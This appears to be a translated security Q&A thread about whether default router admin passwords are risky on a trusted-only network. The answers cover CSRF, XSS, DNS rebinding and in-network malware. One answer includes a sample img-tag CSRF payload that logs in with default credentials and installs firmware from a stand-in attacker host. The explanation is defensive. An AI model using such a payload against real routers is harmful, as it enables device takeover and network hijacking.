有很多文章 解决 了默认路由器管理员密码的危险。某些安全应用程序还将默认路由器管理员密码检测为漏洞。但是,这些文章都集中在您的路由器被入侵时可能发生的情况。
但是假设我们配置了一个路由器,使得管理面板只对本地网络开放。此外,假设连接网络的密码(即通过 wifi)足够安全(即熵非常高),并且仅允许受信任的用户访问网络。
在这些情况下,路由器还会受到威胁吗?是否还需要更改默认路由器管理员密码?我的想法是,如果攻击者无法进入网络,那么无论路由器的管理员密码如何,他们都无法破坏路由器。CSRF 是一种可能性,但可以使用 CSRF 令牌进行防御。还有其他我没有考虑过的可能性吗?
正如您正确注意到的那样,CSRF 攻击是可能的。使用 CSRF 令牌可以防止 CSRF 攻击,但作为路由器的用户,您无能为力。因此,如果您是路由器供应商,您绝对应该实施 CSRF 保护,但作为用户,您必须接受供应商为您提供的内容,而许多供应商没有适当的 CSRF 保护。
除了 CSRF 之外,还有其他可用于针对路由器的攻击。与 CSRF 类似,其中许多使用浏览器作为蹦床,即只需要访问一些嵌入了漏洞利用程序(如嵌入广告中)的网站,并且不需要用户计算机的妥协。其中值得注意的是跨站点脚本 (XSS) 和 DNS 重新绑定攻击。在这里,供应商在理论上可以再次实施适当的保护,但实际上通常不会这样做。
然后,即使是受信任的用户也可能通过各种方式破坏他们的系统。在这种情况下,攻击者位于受信任的网络内部,并且知道默认密码可以更容易地劫持路由器,并使攻击者对网络的控制更加永久且不那么明显。
这意味着即使您认为自己有适当的保护,您也应该本着纵深防御的精神将密码更改为远离默认密码。攻击者要想渗透到网络中必须找出的未知数越多,你就越难为他做这件事,你就越能更好地保护你的网络。当然,这不仅适用于密码,还适用于一般路由器安全性,即某些路由器存在漏洞甚至后门,您甚至不必知道用户的密码即可进行接管。不仅是路由器,您还必须注意其他设备,如打印机、扫描仪、智能灯泡、电视等。
如果网络上只允许受信任的用户,使用默认路由器管理员密码是否危险?
是的,这很危险。这里有一些更“技术”的方法(除了说它不好):
您可能会愉快地访问一个网站,但它可能存在许多问题:
该网站本身已被滥用并插入了恶意内容,或者;
页面上的任何元素都在中间被 MITM 攻击(闭嘴,我想搞笑)并且有元素被 The Thing(tm) 拦截,并且;
CSRF 攻击是通过样式、img、链接或其他任何内容插入的:
粗略的例子:
<img src="http://admin:admin@192.168.0.1/updateFirmware.cgi?file=hxxp://hax.com/hax.bin&confirmUpgrade=true"/>
在许多情况下,如果您可以通过这样的链接使用 admin:admin@routerip 登录,CSRF 保护将无济于事。它将为您创建一个新的会话和令牌,而不是使用您当前的会话和令牌。
恭喜您最新安装了具有完整 shell 访问权限的 Router Backdoor(tm)。
转义上下文并插入hax.js,或者只是可以执行以下功能的 JS 代码:
<img src=""/>上文。此外,.svg图像可以绕过很多 XSS 保护。
有人登录您的无线网络,访问路由器配置页面并进行必要的更改/升级固件/重定向 DNS/他们想要的任何东西。与第一个类似,但使用的是点击式界面。
请记住,如果供应商很垃圾,XSS/CSRF 攻击可能存在,甚至在升级期间添加。
所以不要这样做。请。我的心受不了。:(
是的,路由器已被网络内部执行的恶意软件破坏,测试默认密码列表。恶意软件通过受感染的网络钓鱼附件或浏览器漏洞进入网络。
如果您有能力验证路由器不能在本地网络之外重新配置,那么您不仅有能力更改默认密码,而且有责任修复它。
我觉得被问到这个问题很不寻常,而且我什至不是安全专业人士。这有点像问“如果地下室只允许受信任的收银员,可以让银行金库解锁吗?”。不知道从哪里开始回应。我有点怀疑这个问题是否是 Ali G 风格的发条,为运动而发布。
默认密码——对于任何事情——比不使用密码的系统好不了多少。从某种意义上说,它实际上更糟,因为它助长了密码保护的错觉(这可能是系统安全性的其他部分依赖于检查、平衡和补偿控制的系统的基本假设),而实际上是知情的有恶意的人现在进来了。对于那些知道的人来说,它成了一种后门。渗透测试人员定期在 IT 展会上演示如何轻松地在供应商的数据表和网络上查找默认密码。
当物联网(无需求供应的终极例子)开始运行时,默认密码问题将变得更糟。看到伦敦所有可破解的互联网水壶(是的,真的)的投影显示地图,我仍然感到震惊,这些水壶揭示了他们主人的计算机 IP,并了解了配备相机的娃娃,这些娃娃变成了用户的远程间谍并重新编程为骂脏话。